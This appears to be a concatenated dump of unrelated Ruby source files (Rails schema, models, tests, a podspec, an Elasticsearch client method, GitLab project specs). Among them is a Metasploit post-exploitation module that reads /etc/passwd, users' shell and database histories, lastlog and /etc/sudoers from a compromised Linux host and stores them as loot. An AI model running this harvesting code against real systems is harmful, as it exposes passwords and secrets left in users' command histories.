t.boolean "imported_to_fulfillment", default: false
t.boolean "synch_to_fulfillment"
t.index ["organization_id"], name: "index_sub_service_requests_on_organization_id"
t.index ["owner_id"], name: "index_sub_service_requests_on_owner_id"
t.index ["protocol_id"], name: "index_sub_service_requests_on_protocol_id"
t.index ["service_request_id"], name: "index_sub_service_requests_on_service_request_id"
t.index ["service_requester_id"], name: "index_sub_service_requests_on_service_requester_id"
t.index ["ssr_id"], name: "index_sub_service_requests_on_ssr_id"
t.index ["status"], name: "index_sub_service_requests_on_status"
end
create_table "submission_emails", options: "ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci", force: :cascade do |t|
t.bigint "organization_id"
t.string "email"
t.datetime "created_at", null: false
t.datetime "updated_at", null: false
t.datetime "deleted_at"
t.index ["organization_id"], name: "index_submission_emails_on_organization_id"
end
create_table "subsidies", options: "ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci", force: :cascade do |t|
t.datetime "created_at", null: false
t.datetime "updated_at", null: false
t.datetime "deleted_at"
t.boolean "overridden"
t.bigint "sub_service_request_id"
t.integer "total_at_approval"
t.string "status", default: "Pending"
t.bigint "approved_by"
t.datetime "approved_at"
t.float "percent_subsidy", default: 0.0
t.index ["sub_service_request_id"], name: "index_subsidies_on_sub_service_request_id"
end
create_table "subsidy_maps", options: "ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci", force: :cascade do |t|
t.bigint "organization_id"
t.decimal "max_dollar_cap", precision: 12, scale: 4, default: "0.0"
t.decimal "max_percentage", precision: 5, scale: 2, default: "0.0"
t.datetime "created_at", null: false
t.datetime "updated_at", null: false
t.datetime "deleted_at"
t.float "default_percentage", default: 0.0
t.text "instructions"
t.index ["organization_id"], name: "index_subsidy_maps_on_organization_id"
end
create_table "super_users", options: "ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci", force: :cascade do |t|
t.bigint "identity_id"
t.bigint "organization_id"
t.datetime "created_at", null: false
t.datetime "updated_at", null: false
t.datetime "deleted_at"
t.boolean "access_empty_protocols", default: false
t.boolean "billing_manager"
t.boolean "allow_credit"
t.boolean "hold_emails", default: true
t.index ["identity_id"], name: "index_super_users_on_identity_id"
t.index ["organization_id"], name: "index_super_users_on_organization_id"
end
create_table "surveys", options: "ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci", force: :cascade do |t|
t.string "title", null: false
t.text "description"
t.string "access_code", null: false
t.integer "version", null: false
t.boolean "active", null: false
t.datetime "created_at", null: false
t.datetime "updated_at", null: false
t.string "type"
t.bigint "surveyable_id"
t.string "surveyable_type"
t.index ["surveyable_id", "surveyable_type"], name: "index_surveys_on_surveyable_id_and_surveyable_type"
end
create_table "taggings", options: "ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci", force: :cascade do |t|
t.bigint "tag_id"
t.bigint "taggable_id"
t.string "taggable_type"
t.bigint "tagger_id"
t.string "tagger_type"
t.string "context", limit: 128
t.datetime "created_at"
t.index ["tag_id", "taggable_id", "taggable_type", "context", "tagger_id", "tagger_type"], name: "taggings_idx", unique: true
t.index ["taggable_id", "taggable_type", "context"], name: "index_taggings_on_taggable_id_and_taggable_type_and_context"
t.index ["tagger_id"], name: "index_taggings_on_tagger_id"
end
create_table "tags", options: "ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci", force: :cascade do |t|
t.string "name"
t.integer "taggings_count", default: 0
t.index ["name"], name: "index_tags_on_name", unique: true
end
create_table "tokens", options: "ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci", force: :cascade do |t|
t.bigint "service_request_id"
t.bigint "identity_id"
t.string "token"
t.datetime "created_at", null: false
t.datetime "updated_at", null: false
t.datetime "deleted_at"
t.index ["identity_id"], name: "index_tokens_on_identity_id"
t.index ["service_request_id"], name: "index_tokens_on_service_request_id"
end
create_table "vertebrate_animals_info", options: "ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci", force: :cascade do |t|
t.bigint "protocol_id"
t.string "iacuc_number"
t.string "name_of_iacuc"
t.datetime "iacuc_approval_date"
t.datetime "iacuc_expiration_date"
t.datetime "created_at", null: false
t.datetime "updated_at", null: false
t.datetime "deleted_at"
t.index ["protocol_id"], name: "index_vertebrate_animals_info_on_protocol_id"
end
create_table "visit_groups", options: "ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci", force: :cascade do |t|
t.string "name"
t.bigint "arm_id"
t.datetime "created_at", null: false
t.datetime "updated_at", null: false
t.integer "position"
t.integer "day"
t.integer "window_before", default: 0
t.integer "window_after", default: 0
t.index ["arm_id"], name: "index_visit_groups_on_arm_id"
end
create_table "visits", options: "ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci", force: :cascade do |t|
t.integer "quantity", default: 0
t.string "billing"
t.datetime "created_at", null: false
t.datetime "updated_at", null: false
t.datetime "deleted_at"
t.integer "research_billing_qty", default: 0
t.integer "insurance_billing_qty", default: 0
t.integer "effort_billing_qty", default: 0
t.bigint "line_items_visit_id"
t.bigint "visit_group_id"
t.index ["line_items_visit_id"], name: "index_visits_on_line_items_visit_id"
t.index ["research_billing_qty"], name: "index_visits_on_research_billing_qty"
t.index ["visit_group_id"], name: "index_visits_on_visit_group_id"
end
add_foreign_key "editable_statuses", "organizations"
add_foreign_key "options", "questions"
add_foreign_key "question_responses", "questions"
add_foreign_key "question_responses", "responses"
add_foreign_key "questions", "options", column: "depender_id"
add_foreign_key "questions", "sections"
add_foreign_key "responses", "identities"
add_foreign_key "responses", "surveys"
add_foreign_key "sections", "surveys"
end
| 41.012127 | 153 | 0.725645 |
919fbbcfe8e319ed5ed010d6e8a4c195a1ca003b | 522 | class Item < ApplicationRecord
belongs_to :category
has_many :line_items
has_many :carts, through: :line_items
has_many :comments
  validates :name, presence: true, uniqueness: true
  validates :price, presence: true, numericality: { message: "must be a number" }
  validates :inventory, presence: true, numericality: { message: "must be a number" }
def self.available_items
self.all.select do |item|
item.inventory != 0
end
end
end
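# A minimal alternative sketch: the same filter can run in SQL as a scope
# (assuming `inventory` is a non-null numeric column), which avoids
# instantiating every record just to discard the out-of-stock ones:
#
#   scope :available_items, -> { where.not(inventory: 0) }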
| 26.1 | 67 | 0.720307 |
01f56af733c960281f673d61844775d64061ba22 | 39 | # typed: true
def foo = 42 rescue nil
| 9.75 | 23 | 0.666667 |
03103ffc21ca7c1173a183ffc5c265942b403168 | 441 | class SorceryBruteForceProtection < ActiveRecord::Migration
def self.up
add_column :<%= model_class_name.tableize %>, :failed_logins_count, :integer, :default => 0
add_column :<%= model_class_name.tableize %>, :lock_expires_at, :datetime, :default => nil
end
def self.down
remove_column :<%= model_class_name.tableize %>, :lock_expires_at
remove_column :<%= model_class_name.tableize %>, :failed_logins_count
end
end | 40.090909 | 95 | 0.736961 |
184445c3f7b8644971f2cd6c94af63aff1f81dfd | 3,725 | ##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Post
include Msf::Post::File
include Msf::Post::Linux::System
def initialize(info = {})
super(update_info(info,
'Name' => 'Linux Gather User History',
'Description' => %q{
This module gathers the following user-specific information:
shell history, MySQL history, PostgreSQL history, MongoDB history,
Vim history, lastlog, and sudoers.
},
'License' => MSF_LICENSE,
'Author' =>
[
# based largely on get_bash_history function by Stephen Haywood
'ohdae <bindshell[at]live.com>'
],
'Platform' => ['linux'],
'SessionTypes' => ['shell', 'meterpreter']
))
end
def run
distro = get_sysinfo
print_good('Info:')
print_good("\t#{distro[:version]}")
print_good("\t#{distro[:kernel]}")
user = execute('/usr/bin/whoami')
users = execute('/bin/cat /etc/passwd | cut -d : -f 1').chomp.split
    # Non-root sessions can usually read only their own history, so fall back
    # to the current user (also when /etc/passwd could not be parsed)
    users = [user] if user != 'root' || users.blank?
vprint_status("Retrieving history for #{users.length} users")
shells = %w{ash bash csh ksh sh tcsh zsh}
users.each do |u|
home = get_home_dir(u)
shells.each do |shell|
get_shell_history(u, home, shell)
end
get_mysql_history(u, home)
get_psql_history(u, home)
get_mongodb_history(u, home)
get_vim_history(u, home)
end
last = execute('/usr/bin/last && /usr/bin/lastlog')
sudoers = cat_file('/etc/sudoers')
save('Last logs', last) unless last.blank?
save('Sudoers', sudoers) unless sudoers.blank? || sudoers =~ /Permission denied/
end
def save(msg, data, ctype = 'text/plain')
ltype = 'linux.enum.users'
loot = store_loot(ltype, ctype, session, data, nil, msg)
print_good("#{msg} stored in #{loot.to_s}")
end
def execute(cmd)
vprint_status("Execute: #{cmd}")
output = cmd_exec(cmd)
output
end
def cat_file(filename)
vprint_status("Download: #{filename}")
output = read_file(filename)
output
end
def get_home_dir(user)
home = execute("echo ~#{user}")
if home.empty?
if user == 'root'
home = '/root'
else
home = "/home/#{user}"
end
end
home
end
def get_shell_history(user, home, shell)
vprint_status("Extracting #{shell} history for #{user}")
hist = cat_file("#{home}/.#{shell}_history")
save("#{shell} history for #{user}", hist) unless hist.blank? || hist =~ /No such file or directory/
end
def get_mysql_history(user, home)
vprint_status("Extracting MySQL history for #{user}")
sql_hist = cat_file("#{home}/.mysql_history")
save("MySQL history for #{user}", sql_hist) unless sql_hist.blank? || sql_hist =~ /No such file or directory/
end
def get_psql_history(user, home)
vprint_status("Extracting PostgreSQL history for #{user}")
sql_hist = cat_file("#{home}/.psql_history")
save("PostgreSQL history for #{user}", sql_hist) unless sql_hist.blank? || sql_hist =~ /No such file or directory/
end
def get_mongodb_history(user, home)
vprint_status("Extracting MongoDB history for #{user}")
sql_hist = cat_file("#{home}/.dbshell")
save("MongoDB history for #{user}", sql_hist) unless sql_hist.blank? || sql_hist =~ /No such file or directory/
end
def get_vim_history(user, home)
vprint_status("Extracting Vim history for #{user}")
vim_hist = cat_file("#{home}/.viminfo")
save("Vim history for #{user}", vim_hist) unless vim_hist.blank? || vim_hist =~ /No such file or directory/
end
end
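# A usage sketch from msfconsole (the module path is assumed from the upstream
# module tree, not stated in this file):
#
#   use post/linux/gather/enum_users_history
#   set SESSION 1
#   run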
| 31.302521 | 118 | 0.638121 |
ff45310ed084a656fa34d71a538b01831229ad76 | 779 | require 'test_helper'
class StaticPagesControllerTest < ActionDispatch::IntegrationTest
def setup
@base_title = "Ruby on Rails Tutorial Sample App"
end
test "should get root" do
get root_path
assert_response :success
end
test "should get home" do
get home_path
assert_response :success
assert_select "title", @base_title
end
test "should get help" do
get help_path
assert_response :success
assert_select "title", "Help | #{@base_title}"
end
test "should get about" do
get about_path
assert_response :success
assert_select "title", "About | #{@base_title}"
end
test "should get contact" do
get contact_path
assert_response :success
assert_select "title", "Contact | #{@base_title}"
end
end
| 21.054054 | 65 | 0.699615 |
08c7964c90bbe3273c6fa3ac9e28c034b51e5d8c | 880 |
Pod::Spec.new do |s|
s.name = "UpstraUIKit"
s.version = "1.0.0"
s.summary = "A brief description of UpstraUIKit project."
s.description = "An extended description of UpstraUIKit project."
s.homepage = "https://github.com/EkoCommunications/EkoMessagingSDKUIKit"
s.license = { :type => 'Copyright', :text => <<-LICENSE
Copyright 2018
Permission is granted to...
LICENSE
}
s.author = { "$(git config user.name)" => "$(git config user.email)" }
s.source = { :git => 'https://github.com/EkoCommunications/EkoMessagingSDKUIKit.git', :tag => "#{s.version}" }
s.vendored_frameworks = 'UpstraUIKit.framework', 'EkoChat.framework', 'Realm.framework'
s.platform = :ios
s.swift_version = "5"
s.ios.deployment_target = '11.1'
end
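# A minimal Podfile sketch for consuming this spec (target name is a
# placeholder; assumes the pod is referenced by local path rather than a
# published spec repo):
#
#   target 'MyApp' do
#     pod 'UpstraUIKit', :path => '../UpstraUIKit'
#   end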
| 44 | 120 | 0.581818 |
bb4e50467086f2871d6bc40c3818aca2336062fe | 2,029 | require 'nokogiri'
module Stratify
module Garmin
class RssItemAdapter
attr_reader :item
def initialize(item)
@item = item
end
def activity_type
description_content_in_table_row(4)
end
def created_at
item.pubDate
end
def description
description_as_nokogiri_doc.at_xpath('//table/tr[1]/td[1]').content
end
def distance_in_miles
distance_string = description_content_in_table_row(6)
distance_string.to_f
end
def elevation_gain_in_feet
elevation_gain_string = description_content_in_table_row(8)
elevation_gain_string.to_i
end
def event_type
description_content_in_table_row(5)
end
def guid
guid_url = item.guid
guid_url.slice(/\d*$/) # parse the id out of the url ".../activity/12345678"
end
def starting_latitude
starting_location[:latitude]
end
def starting_longitude
starting_location[:longitude]
end
def time_in_seconds
time_string = description_content_in_table_row(7)
time_components = time_string.split(':').map(&:to_i)
      hours, minutes, seconds = time_components
(hours * 3600) + (minutes * 60) + seconds
end
def title
item.title
end
def username
description_content_in_table_row(2)
end
private
def description_as_nokogiri_doc
@description_doc ||= Nokogiri::HTML(item.description)
end
def description_content_in_table_row(row_index)
description_as_nokogiri_doc.at_xpath("//table/tr[#{row_index}]/td[2]").content
end
def starting_location
lat_long_pair_as_strings = item.georss_point.split
lat_long_pair_as_floats = lat_long_pair_as_strings.map(&:to_f)
{:latitude => lat_long_pair_as_floats.first, :longitude => lat_long_pair_as_floats.last}
end
end
end
end
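# A minimal usage sketch, assuming `item` is an entry from a Garmin Connect
# RSS feed parsed with Ruby's standard `rss` library:
#
#   adapter = Stratify::Garmin::RssItemAdapter.new(item)
#   adapter.activity_type      # e.g. "Cycling"
#   adapter.distance_in_miles  # e.g. 12.4
#   adapter.time_in_seconds    # "hh:mm:ss" converted to an integer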
| 24.154762 | 96 | 0.65451 |
f82ba8d3297b037397bdaed37ff0b41380771e9e | 168 | require 'jsonmodel'
require 'client_enum_source'
JSONModel::init(:client_mode => false, :strict_mode => false, :enum_source => ClientEnumSource.new)
include JSONModel
| 28 | 99 | 0.785714 |
abf12f3d4b1fa90c7e4fc50012cb906b436d5e82 | 741 | class SessionsController < ApplicationController
def new
end
def create
@user = User.find_by(email: params[:session][:email].downcase)
if @user && @user.authenticate(params[:session][:password])
if @user.activated?
log_in @user
params[:session][:remember_me] == '1' ? remember(@user) : forget(@user)
redirect_back_or @user
else
message = "Account not activated."
message += " Check your email for the actvation link."
flash[:warning] = message
redirect_to root_url
end
else
flash.now[:danger] = 'Invalid email/password combination'
render 'new'
end
end
def destroy
log_out if logged_in?
redirect_to root_url
end
end
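# A sketch of the `remember` helper this controller relies on (only the call
# is visible here; this body is an assumption based on the conventional
# SessionsHelper implementation):
#
#   def remember(user)
#     user.remember
#     cookies.permanent.signed[:user_id] = user.id
#     cookies.permanent[:remember_token] = user.remember_token
#   end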
| 24.7 | 79 | 0.635628 |
bb531ac531ac21f4fdef636467eff87b6037b52b | 2,524 | # Licensed to Elasticsearch B.V. under one or more contributor
# license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright
# ownership. Elasticsearch B.V. licenses this file to you under
# the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
module Elasticsearch
module API
module Cat
module Actions
# Returns a concise representation of the cluster health.
#
# @option arguments [String] :format a short version of the Accept header, e.g. json, yaml
# @option arguments [List] :h Comma-separated list of column names to display
# @option arguments [Boolean] :help Return help information
# @option arguments [List] :s Comma-separated list of column names or column aliases to sort by
# @option arguments [String] :time The unit in which to display time values
# (options: d,h,m,s,ms,micros,nanos)
# @option arguments [Boolean] :ts Set to false to disable timestamping
# @option arguments [Boolean] :v Verbose mode. Display column headers
# @option arguments [Hash] :headers Custom HTTP headers
#
# @see https://www.elastic.co/guide/en/elasticsearch/reference/7.8/cat-health.html
#
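        # A usage sketch (assuming a configured Elasticsearch client instance):
        #
        #   client.cat.health(v: true, format: 'json')
        #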
def health(arguments = {})
headers = arguments.delete(:headers) || {}
arguments = arguments.clone
method = Elasticsearch::API::HTTP_GET
path = "_cat/health"
params = Utils.__validate_and_extract_params arguments, ParamsRegistry.get(__method__)
params[:h] = Utils.__listify(params[:h]) if params[:h]
body = nil
perform_request(method, path, params, body, headers).body
end
# Register this action with its valid params when the module is loaded.
#
# @since 6.2.0
ParamsRegistry.register(:health, [
:format,
:h,
:help,
:s,
:time,
:ts,
:v
].freeze)
end
end
end
end
| 37.671642 | 103 | 0.656498 |
1c528df60a502115485137b46f002375fa60c71e | 846 | require 'test_helper'
describe Aliyun::Oss::Struct::Directory do
let(:bucket_name) { 'bucket-name' }
let(:bucket_location) { 'oss-cn-beijing' }
let(:host) { "#{bucket_location}.aliyuncs.com" }
let(:endpoint) { "http://#{bucket_name}.#{host}/" }
let(:access_key) { 'AASSJJKKW94324JJJJ' }
let(:secret_key) { 'OtSSSSxIsf111A7SwPzILwy8Bw21TLhquhboDYROV' }
let(:client) do
Aliyun::Oss::Client.new(
access_key,
secret_key,
host: host,
bucket: bucket_name
)
end
it '#list should list objects under directory' do
path = "http://#{bucket_name}.#{host}/?prefix=fun/movie/"
stub_get_request(path, 'directory/list.xml')
dir = Aliyun::Oss::Struct::Directory.new(key: 'fun/movie/', client: client)
dir.list.each do |obj|
assert_kind_of(Aliyun::Oss::Struct::File, obj)
end
end
end
| 30.214286 | 79 | 0.658392 |
8766638403cecca1cb936648bb4133fd30f2a7cf | 56 | module CacheTranslatedAttribute
VERSION = "0.0.2"
end
| 14 | 31 | 0.767857 |
39581c133b305b421dff0f2732f2bf628eb6e638 | 129,699 | require 'spec_helper'
describe Project do
include ProjectForksHelper
describe 'associations' do
it { is_expected.to belong_to(:group) }
it { is_expected.to belong_to(:namespace) }
it { is_expected.to belong_to(:creator).class_name('User') }
it { is_expected.to have_many(:users) }
it { is_expected.to have_many(:services) }
it { is_expected.to have_many(:events) }
it { is_expected.to have_many(:merge_requests) }
it { is_expected.to have_many(:issues) }
it { is_expected.to have_many(:milestones) }
it { is_expected.to have_many(:project_members).dependent(:delete_all) }
it { is_expected.to have_many(:users).through(:project_members) }
it { is_expected.to have_many(:requesters).dependent(:delete_all) }
it { is_expected.to have_many(:notes) }
it { is_expected.to have_many(:snippets).class_name('ProjectSnippet') }
it { is_expected.to have_many(:deploy_keys_projects) }
it { is_expected.to have_many(:deploy_keys) }
it { is_expected.to have_many(:hooks) }
it { is_expected.to have_many(:protected_branches) }
it { is_expected.to have_one(:forked_project_link) }
it { is_expected.to have_one(:slack_service) }
it { is_expected.to have_one(:microsoft_teams_service) }
it { is_expected.to have_one(:mattermost_service) }
it { is_expected.to have_one(:packagist_service) }
it { is_expected.to have_one(:pushover_service) }
it { is_expected.to have_one(:asana_service) }
it { is_expected.to have_many(:boards) }
it { is_expected.to have_one(:campfire_service) }
it { is_expected.to have_one(:drone_ci_service) }
it { is_expected.to have_one(:emails_on_push_service) }
it { is_expected.to have_one(:pipelines_email_service) }
it { is_expected.to have_one(:irker_service) }
it { is_expected.to have_one(:pivotaltracker_service) }
it { is_expected.to have_one(:hipchat_service) }
it { is_expected.to have_one(:flowdock_service) }
it { is_expected.to have_one(:assembla_service) }
it { is_expected.to have_one(:slack_slash_commands_service) }
it { is_expected.to have_one(:mattermost_slash_commands_service) }
it { is_expected.to have_one(:gemnasium_service) }
it { is_expected.to have_one(:buildkite_service) }
it { is_expected.to have_one(:bamboo_service) }
it { is_expected.to have_one(:teamcity_service) }
it { is_expected.to have_one(:jira_service) }
it { is_expected.to have_one(:github_service) }
it { is_expected.to have_one(:redmine_service) }
it { is_expected.to have_one(:custom_issue_tracker_service) }
it { is_expected.to have_one(:bugzilla_service) }
it { is_expected.to have_one(:gitlab_issue_tracker_service) }
it { is_expected.to have_one(:external_wiki_service) }
it { is_expected.to have_one(:project_feature) }
it { is_expected.to have_one(:statistics).class_name('ProjectStatistics') }
it { is_expected.to have_one(:import_data).class_name('ProjectImportData') }
it { is_expected.to have_one(:last_event).class_name('Event') }
it { is_expected.to have_one(:forked_from_project).through(:forked_project_link) }
it { is_expected.to have_one(:auto_devops).class_name('ProjectAutoDevops') }
it { is_expected.to have_many(:commit_statuses) }
it { is_expected.to have_many(:pipelines) }
it { is_expected.to have_many(:builds) }
it { is_expected.to have_many(:build_trace_section_names)}
it { is_expected.to have_many(:runner_projects) }
it { is_expected.to have_many(:runners) }
it { is_expected.to have_many(:variables) }
it { is_expected.to have_many(:triggers) }
it { is_expected.to have_many(:pages_domains) }
it { is_expected.to have_many(:labels).class_name('ProjectLabel') }
it { is_expected.to have_many(:users_star_projects) }
it { is_expected.to have_many(:environments) }
it { is_expected.to have_many(:deployments) }
it { is_expected.to have_many(:todos) }
it { is_expected.to have_many(:releases) }
it { is_expected.to have_many(:lfs_objects_projects) }
it { is_expected.to have_many(:project_group_links) }
it { is_expected.to have_many(:notification_settings).dependent(:delete_all) }
it { is_expected.to have_many(:forks).through(:forked_project_links) }
it { is_expected.to have_many(:approver_groups).dependent(:destroy) }
it { is_expected.to have_many(:uploads) }
it { is_expected.to have_many(:pipeline_schedules) }
it { is_expected.to have_many(:members_and_requesters) }
it { is_expected.to have_many(:clusters) }
it { is_expected.to have_many(:custom_attributes).class_name('ProjectCustomAttribute') }
it { is_expected.to have_many(:project_badges).class_name('ProjectBadge') }
it { is_expected.to have_many(:lfs_file_locks) }
it { is_expected.to have_many(:project_deploy_tokens) }
it { is_expected.to have_many(:deploy_tokens).through(:project_deploy_tokens) }
context 'after initialized' do
it "has a project_feature" do
expect(described_class.new.project_feature).to be_present
end
end
context 'when creating a new project' do
it 'automatically creates a CI/CD settings row' do
project = create(:project)
expect(project.ci_cd_settings).to be_an_instance_of(ProjectCiCdSetting)
expect(project.ci_cd_settings).to be_persisted
end
end
context 'updating cd_cd_settings' do
it 'does not raise an error' do
project = create(:project)
expect { project.update(ci_cd_settings: nil) }.not_to raise_exception
end
end
describe '#members & #requesters' do
let(:project) { create(:project, :public, :access_requestable) }
let(:requester) { create(:user) }
let(:developer) { create(:user) }
before do
project.request_access(requester)
project.add_developer(developer)
end
it_behaves_like 'members and requesters associations' do
let(:namespace) { project }
end
end
end
describe 'modules' do
subject { described_class }
it { is_expected.to include_module(Gitlab::ConfigHelper) }
it { is_expected.to include_module(Gitlab::ShellAdapter) }
it { is_expected.to include_module(Gitlab::VisibilityLevel) }
it { is_expected.to include_module(Referable) }
it { is_expected.to include_module(Sortable) }
end
describe 'scopes' do
context '#with_wiki_enabled' do
it 'returns a project' do
project = create(:project_empty_repo, wiki_access_level: ProjectFeature::ENABLED)
project1 = create(:project, wiki_access_level: ProjectFeature::DISABLED)
expect(described_class.with_wiki_enabled).to include(project)
expect(described_class.with_wiki_enabled).not_to include(project1)
end
end
end
describe 'validation' do
let!(:project) { create(:project) }
it { is_expected.to validate_presence_of(:name) }
it { is_expected.to validate_uniqueness_of(:name).scoped_to(:namespace_id) }
it { is_expected.to validate_length_of(:name).is_at_most(255) }
it { is_expected.to validate_presence_of(:path) }
it { is_expected.to validate_length_of(:path).is_at_most(255) }
it { is_expected.to validate_length_of(:description).is_at_most(2000) }
it { is_expected.to validate_length_of(:ci_config_path).is_at_most(255) }
it { is_expected.to allow_value('').for(:ci_config_path) }
it { is_expected.not_to allow_value('test/../foo').for(:ci_config_path) }
it { is_expected.not_to allow_value('/test/foo').for(:ci_config_path) }
it { is_expected.to validate_presence_of(:creator) }
it { is_expected.to validate_presence_of(:namespace) }
it { is_expected.to validate_presence_of(:repository_storage) }
it 'does not allow new projects beyond user limits' do
project2 = build(:project)
allow(project2).to receive(:creator).and_return(double(can_create_project?: false, projects_limit: 0).as_null_object)
expect(project2).not_to be_valid
expect(project2.errors[:limit_reached].first).to match(/Personal project creation is not allowed/)
end
describe 'wiki path conflict' do
context "when the new path has been used by the wiki of other Project" do
it 'has an error on the name attribute' do
new_project = build_stubbed(:project, namespace_id: project.namespace_id, path: "#{project.path}.wiki")
expect(new_project).not_to be_valid
expect(new_project.errors[:name].first).to eq('has already been taken')
end
end
context "when the new wiki path has been used by the path of other Project" do
it 'has an error on the name attribute' do
project_with_wiki_suffix = create(:project, path: 'foo.wiki')
new_project = build_stubbed(:project, namespace_id: project_with_wiki_suffix.namespace_id, path: 'foo')
expect(new_project).not_to be_valid
expect(new_project.errors[:name].first).to eq('has already been taken')
end
end
end
context 'repository storages inclusion' do
let(:project2) { build(:project, repository_storage: 'missing') }
before do
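# Replace the configured storages so only 'custom' exists and 'missing' is guaranteed to be invalid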
storages = { 'custom' => { 'path' => 'tmp/tests/custom_repositories' } }
allow(Gitlab.config.repositories).to receive(:storages).and_return(storages)
end
it "does not allow repository storages that don't match a label in the configuration" do
expect(project2).not_to be_valid
expect(project2.errors[:repository_storage].first).to match(/is not included in the list/)
end
end
context '#mark_stuck_remote_mirrors_as_failed!' do
it 'fails stuck remote mirrors' do
project = create(:project, :repository, :remote_mirror)
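# A mirror left in the "started" state for two days is considered stuck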
project.remote_mirrors.first.update_attributes(
update_status: :started,
last_update_at: 2.days.ago
)
expect do
project.mark_stuck_remote_mirrors_as_failed!
end.to change { project.remote_mirrors.stuck.count }.from(1).to(0)
end
end
context 'mirror' do
subject { build(:project, mirror: true) }
it { is_expected.to validate_presence_of(:import_url) }
it { is_expected.to validate_presence_of(:mirror_user) }
end
it 'does not allow an invalid URI as import_url' do
project2 = build(:project, import_url: 'invalid://')
expect(project2).not_to be_valid
end
it 'does allow a valid URI as import_url' do
project2 = build(:project, import_url: 'ssh://[email protected]/project.git')
expect(project2).to be_valid
end
it 'allows an empty URI' do
project2 = build(:project, import_url: '')
expect(project2).to be_valid
end
it 'does not produce import data on an empty URI' do
project2 = build(:project, import_url: '')
expect(project2.import_data).to be_nil
end
it 'does not produce import data on an invalid URI' do
project2 = build(:project, import_url: 'test://')
expect(project2.import_data).to be_nil
end
it "does not allow blocked import_url localhost" do
project2 = build(:project, import_url: 'http://localhost:9000/t.git')
expect(project2).to be_invalid
expect(project2.errors[:import_url].first).to include('Requests to localhost are not allowed')
end
it "does not allow blocked import_url port" do
project2 = build(:project, import_url: 'http://github.com:25/t.git')
expect(project2).to be_invalid
expect(project2.errors[:import_url].first).to include('Only allowed ports are 22, 80, 443')
end
it 'creates import state when mirror gets enabled' do
project2 = create(:project)
expect do
project2.update_attributes(mirror: true, import_url: generate(:url), mirror_user: project.creator)
end.to change { ProjectImportState.where(project: project2).count }.from(0).to(1)
end
describe 'project pending deletion' do
let!(:project_pending_deletion) do
create(:project,
pending_delete: true)
end
let(:new_project) do
build(:project,
name: project_pending_deletion.name,
namespace: project_pending_deletion.namespace)
end
before do
new_project.validate
end
it 'contains errors related to the project being deleted' do
expect(new_project.errors.full_messages.first).to eq('The project is still being deleted. Please try again later.')
end
end
describe 'path validation' do
it 'allows paths reserved on the root namespace' do
project = build(:project, path: 'api')
expect(project).to be_valid
end
it 'rejects paths reserved on another level' do
project = build(:project, path: 'tree')
expect(project).not_to be_valid
end
it 'rejects nested paths' do
parent = create(:group, :nested, path: 'environments')
project = build(:project, path: 'folders', namespace: parent)
expect(project).not_to be_valid
end
it 'allows a reserved group name' do
parent = create(:group)
project = build(:project, path: 'avatar', namespace: parent)
expect(project).to be_valid
end
it 'allows a path ending in a period' do
project = build(:project, path: 'foo.')
expect(project).to be_valid
end
end
end
describe 'project token' do
it 'sets a random token if none is provided' do
project = FactoryBot.create(:project, runners_token: '')
expect(project.runners_token).not_to eq('')
end
it 'does not set a random token if one is provided' do
project = FactoryBot.create(:project, runners_token: 'my-token')
expect(project.runners_token).to eq('my-token')
end
end
describe 'Respond to' do
it { is_expected.to respond_to(:url_to_repo) }
it { is_expected.to respond_to(:repo_exists?) }
it { is_expected.to respond_to(:execute_hooks) }
it { is_expected.to respond_to(:owner) }
it { is_expected.to respond_to(:path_with_namespace) }
it { is_expected.to respond_to(:full_path) }
end
describe 'delegation' do
[:add_guest, :add_reporter, :add_developer, :add_master, :add_user, :add_users].each do |method|
it { is_expected.to delegate_method(method).to(:team) }
end
it { is_expected.to delegate_method(:members).to(:team).with_prefix(true) }
it { is_expected.to delegate_method(:name).to(:owner).with_prefix(true).with_arguments(allow_nil: true) }
end
describe '#to_reference' do
let(:owner) { create(:user, name: 'Gitlab') }
let(:namespace) { create(:namespace, path: 'sample-namespace', owner: owner) }
let(:project) { create(:project, path: 'sample-project', namespace: namespace) }
let(:group) { create(:group, name: 'Group', path: 'sample-group') }
context 'when nil argument' do
it 'returns nil' do
expect(project.to_reference).to be_nil
end
end
context 'when full is true' do
it 'returns complete path to the project' do
expect(project.to_reference(full: true)).to eq 'sample-namespace/sample-project'
expect(project.to_reference(project, full: true)).to eq 'sample-namespace/sample-project'
expect(project.to_reference(group, full: true)).to eq 'sample-namespace/sample-project'
end
end
context 'when same project argument' do
it 'returns nil' do
expect(project.to_reference(project)).to be_nil
end
end
context 'when cross namespace project argument' do
let(:another_namespace_project) { create(:project, name: 'another-project') }
it 'returns complete path to the project' do
expect(project.to_reference(another_namespace_project)).to eq 'sample-namespace/sample-project'
end
end
context 'when same namespace / cross-project argument' do
let(:another_project) { create(:project, namespace: namespace) }
it 'returns path to the project' do
expect(project.to_reference(another_project)).to eq 'sample-project'
end
end
context 'when different namespace / cross-project argument' do
let(:another_namespace) { create(:namespace, path: 'another-namespace', owner: owner) }
let(:another_project) { create(:project, path: 'another-project', namespace: another_namespace) }
it 'returns full path to the project' do
expect(project.to_reference(another_project)).to eq 'sample-namespace/sample-project'
end
end
context 'when argument is a namespace' do
context 'with same project path' do
it 'returns path to the project' do
expect(project.to_reference(namespace)).to eq 'sample-project'
end
end
context 'with different project path' do
it 'returns full path to the project' do
